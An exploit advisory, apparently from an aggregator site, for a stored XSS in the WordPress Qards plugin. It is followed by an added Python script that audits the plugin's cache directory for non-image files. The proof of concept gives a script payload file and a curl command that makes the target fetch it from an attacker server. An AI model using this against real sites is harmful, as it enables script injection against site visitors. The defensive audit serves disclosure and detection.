## https://sploitus.com/exploit?id=WPEX-ID:AAF192D9-3C7F-4AA2-88CF-5DF26C7A8721
The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
takes the value of the "url" parameter and, using the PHP cURL functions, saves the fetched website's content to a file in /wp-content/plugins/qards/images/ with a filename in the following format:
<hash md5>.<mime-type>
On a web server with "Directory Listing" enabled, you could easily find that file.
Due to improper sanitization, the generated file suffers from a persistent XSS vulnerability.
POC:
1. Create a remote file (evil.html) on your webserver with the following content:
<script> alert('XSS'); </script>
2. curl 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://yourserver/evil.html'
3. Browse to http://target/wp-content/plugins/qards/images/ to get the file
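
For defenders, an added example (not part of the original advisory or the plugin's code): a Python audit of the plugin's images/ directory that flags stored files whose suffix or leading bytes are not a raster image. The 32-hex-character name pattern, the short suffix form and the names audit_cache and demo are assumptions based on the filename format described above.

```python
import re
import tempfile
from pathlib import Path

# Assumption: cache entries are named <32 hex chars>.<suffix>, suffix taken from the MIME type.
CACHE_NAME = re.compile(r"^[0-9a-f]{32}\.([A-Za-z0-9.+-]+)$")

# Leading bytes of the raster formats a screenshot proxy has reason to cache.
IMAGE_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def audit_cache(directory):
    """Return (filename, reason) for cache entries that are not plain raster images."""
    findings = []
    for path in sorted(Path(directory).iterdir()):
        match = CACHE_NAME.match(path.name)
        if not match or not path.is_file():
            continue  # not a file written by the proxy
        suffix = match.group(1).lower()
        magics = IMAGE_MAGIC.get(suffix)
        if magics is None:
            findings.append((path.name, f"non-image suffix .{suffix}"))
            continue
        with path.open("rb") as fh:
            head = fh.read(16)
        if not head.startswith(magics):  # suffix claims an image, bytes disagree
            findings.append((path.name, f"content is not {suffix}"))
    return findings


def demo():
    """Audit a constructed directory (sample files made up for this example)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ("a" * 32 + ".png")).write_bytes(b"\x89PNG\r\n\x1a\n" + b"\0" * 8)
        (root / ("b" * 32 + ".html")).write_bytes(b"<script> alert('XSS'); </script>")
        (root / ("c" * 32 + ".gif")).write_bytes(b"<html>not a gif</html>")
        (root / "index.php").write_bytes(b"")  # unrelated file, ignored
        return audit_cache(root)


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

Point audit_cache at the real wp-content/plugins/qards/images/ path on the server; any finding is a file the proxy stored that a browser would not treat as an image.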